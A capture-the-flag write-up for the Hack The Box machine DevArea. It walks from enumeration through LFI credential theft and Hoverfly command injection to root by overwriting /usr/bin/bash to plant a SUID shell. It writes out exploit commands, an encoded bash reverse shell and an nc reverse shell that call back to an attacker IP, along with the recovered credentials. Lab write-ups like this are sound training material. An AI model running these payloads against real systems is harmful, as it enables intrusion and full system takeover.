Hack The Box DevArea Writeup | HTB Guide and Exploit Path
A full Hack The Box DevArea writeup covering reconnaissance, LFI, credential harvesting, initial access, and privilege escalation on the HTB machine.
Hack The Box DevArea Writeup
This writeup is a complete Hack The Box DevArea report for the HTB machine, covering the full exploit path from enumeration to root.
If you are searching for a DevArea HTB writeup or Hack The Box guide for the machine, this post focuses on the practical attack flow used to compromise the target.
Quick Summary
The box exposed FTP, SSH, HTTP, and application services that led to virtual host discovery, anonymous FTP access, and a vulnerable employee service JAR. From there, an LFI/SSRF issue was used to extract local files and recover credentials, followed by authenticated command injection on Hoverfly and a final privilege escalation via a sudo misconfiguration and shell file overwrite.
1. Reconnaissance & Enumeration
The attack began with a standard Nmap scan against the target IP (10.129.29.105), revealing several exposed services:
- Port 21: FTP (Anonymous login allowed)
- Port 22: SSH
- Port 80: HTTP
- Port 8080: HTTP-Proxy (Jetty)
- Port 8888: Hoverfly Web Interface
Using ffuf, virtual host routing was discovered, linking devarea.htb to the target. Directory fuzzing on port 80 uncovered an /assets directory.
Logging into the FTP server anonymously (ftp 10.129.29.105 with user anonymous) yielded a file named employee-service.jar. Analyzing this application indicated it was vulnerable to CVE-2022-46364 (an SSRF/LFI vulnerability often associated with Apache CXF).
Vulnerability Overview
The main issues in this Hack The Box DevArea writeup were:
- Anonymous FTP exposure of an application JAR
- SSRF/LFI file read via the employee service endpoint
- Hardcoded service credentials recovered from a systemd unit file
- Authenticated command injection in Hoverfly
- A dangerous
sudoworkflow combined with writable shell binary access
2. Initial Foothold (LFI to Credential Harvesting)
With the CVE identified, an exploit script (CVE-2022-46364.py) was used to target the /employeeservice endpoint on port 8080. This allowed for arbitrary file reading on the target system.
Validating the LFI:
python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/passwd -d devarea.htb
This successfully returned the /etc/passwd file, confirming the presence of the user dev_ryan.
Extracting Hardcoded Credentials: Knowing Hoverfly was running on port 8888, the LFI was used to read the systemd service file responsible for starting it.
python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/systemd/system/hoverfly.service -d devarea.htb
The output revealed the exact execution command used to start the service, exposing hardcoded administrator credentials:
ExecStart=/opt/HoverFly/hoverfly -add -username admin -password O7IJ27MyyXiU
Credentials Recovered
For readers skimming the exploit chain, the key credential recovered from the HTB DevArea host was:
- Username:
admin - Password:
O7IJ27MyyXiU
3. User Compromise (dev_ryan)
With the admin : O7IJ27MyyXiU credentials in hand, the focus shifted to the Hoverfly service on port 8888. Hoverfly is vulnerable to CVE-2025-54123, an Authenticated Command Injection flaw.
Testing Code Execution:
./CVE-2025-54123.sh -t http://devarea.htb:8888 -u admin -p O7IJ27MyyXiU -c "id"
# Output: uid=1001(dev_ryan) gid=1001(dev_ryan) groups=1001(dev_ryan)
Catching the Reverse Shell: To gain an interactive session, a base64-encoded bash reverse shell payload was injected and executed.
./CVE-2025-54123.sh -t http://devarea.htb:8888 -u admin -p O7IJ27MyyXiU -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4yMjcvNDQ0NCAwPiYxCg== | base64 -d | bash"
A listener on Kali (nc -lvnp 4444) caught the connection, providing a shell as dev_ryan.
Why This Step Matters
This stage turns the box from a file-read only finding into real code execution. For a Hack The Box writeup or guide, this is the pivot point where reconnaissance becomes an interactive foothold.
4. Privilege Escalation (Root)
Post-exploitation enumeration revealed a few interesting artifacts, including a syswatch.zip file containing an environment configuration (/etc/syswatch.env) with an admin password. However, the primary escalation vector lay in a misconfiguration involving sudo and the /usr/bin/bash binary.
The user dev_ryan had sudo privileges to execute /opt/syswatch/syswatch.sh web-status without a password. Additionally, dev_ryan had abnormal write permissions to the system's core shell binary: /usr/bin/bash.
The goal was to overwrite /usr/bin/bash with a malicious script. When the sudo script called bash internally, it would execute the payload as root.
The "Text File Busy" Problem
Because the initial reverse shell was spawned using bash, the /usr/bin/bash binary was actively running in memory. Linux kernel protections prevent running executables from being modified, throwing a Text file busy error.
The Two-Shell Bypass ("The Escape Pod")
To bypass the lock, a second reverse shell had to be spawned using /bin/sh instead of bash.
From the initial dev_ryan bash shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.227 9002 >/tmp/f &
Once the second shell was caught on port 9002 (safely anchored to sh), the original bash process was identified and assassinated to free the file.
lsof /usr/bin/bash
kill -9 <PID>
The SUID Trap
With the file unlocked, a backup of the real bash binary was made (to ensure the system remained functional and the exploit had a shell to copy). Then, /usr/bin/bash was overwritten with a malicious script designed to copy the backup to /tmp and assign it SUID root permissions.
# 1. Back up the real shell
cp /usr/bin/bash /tmp/bash.bak
# 2. Plant the malicious script
cat > /usr/bin/bash << 'EOF'
#!/bin/sh
cp /tmp/bash.bak /tmp/rootbash
chmod 4755 /tmp/rootbash
EOF
Execution and Capture
The trap was sprung by invoking the vulnerable script via sudo. The script executed the poisoned bash binary as root, triggering the payload.
sudo /opt/syswatch/syswatch.sh web-status
The payload successfully created /tmp/rootbash with SUID permissions. The root shell was popped by executing the new binary with the -p flag (to preserve privileges).
/tmp/rootbash -p
whoami
# Output: root
cat /root/root.txt